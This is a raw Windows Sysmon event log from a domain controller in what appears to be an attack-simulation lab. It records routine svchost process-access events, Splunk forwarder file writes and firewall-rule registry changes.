12:02:17.710{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005236Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.710{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005235Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.710{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005234Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.710{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005233Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.710{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005232Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.710{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005231Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.710{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005230Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.710{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005229Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.710{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005228Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.710{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005227Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.694{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005226Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.694{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005225Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.694{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005224Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.694{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005223Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.694{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005222Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.694{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005221Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.694{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005220Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.694{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005219Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.694{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005218Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.694{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CDBA6ECF8E3D1B3D53AE8DC6025D4CC,SHA256=E4FAC81A77982A3FE5EB2E44AFB9A6753DD9CD295FFE1B2D3CF457CABEAF5E7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005217Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.678{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\SystemApps\Microsoft.AccountsControl_cw5n1h2txyewy\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64MD5=1036E3DDDC89A4E68D8A33F3823A180E,SHA256=FB5E512425FC9449316EC95969EBE71E2D576DBAB833D61E2A5B9330FD70EE02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005216Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.663{266CAFBE-648B-6064-7A00-00000000AE01}4692NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2A088A9FF143859B8C85D6B4C625243,SHA256=53C058B227DAD4E5204811C06D3072B22114B4ABA42F87659B75B5525D9A3BF3,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000005215Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.647{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-969871995-3242822759-583047763-1618006129-3578262429-3647035748-2471858633S-1-5-21-4055678433-3894535204-3898404691-500v2.26|AppPkgId=S-1-15-2-969871995-3242822759-583047763-1618006129-3578262429-3647035748-2471858633|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|C=S-1-15-3-1|C=S-1-15-3-9|C=S-1-15-3-969871995-3242822759-583047763-1618006129-3578262429-3647035748-2471858633|M=microsoft.accountscontrol_cw5n1h2txyewy|Name=@{Microsoft.AccountsControl_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|Desc=@{Microsoft.AccountsControl_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|D=C:\Windows\SystemApps\Microsoft.AccountsControl_cw5n1h2txyewy\|PFN=Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy| 13241300x80000000000000005214Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:17.647{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{CB04DF19-985E-4DCF-A70A-8EB4AF96DFBC}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|Desc=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-969871995-3242822759-583047763-1618006129-3578262429-3647035748-2471858633|EmbedCtxt=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|Platform=2:6:2|Platform2=GTEQ| 23542300x80000000000000005213Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.647{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{521a01b1-5b6c-41b6-ad58-79363f21599f}\Apps.indexMD5=D38A175DD3C786FE6065A00AD306D74F,SHA256=57D9784D2866D21A61FA5FB04373807EDCBF7FAF298A2894C482A6EA80D419FD,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000005212Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:17.647{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{F6F1BF33-31A0-42C1-B633-902A103D2E4B}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|Desc=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-969871995-3242822759-583047763-1618006129-3578262429-3647035748-2471858633|EmbedCtxt=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}| 13241300x80000000000000005211Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 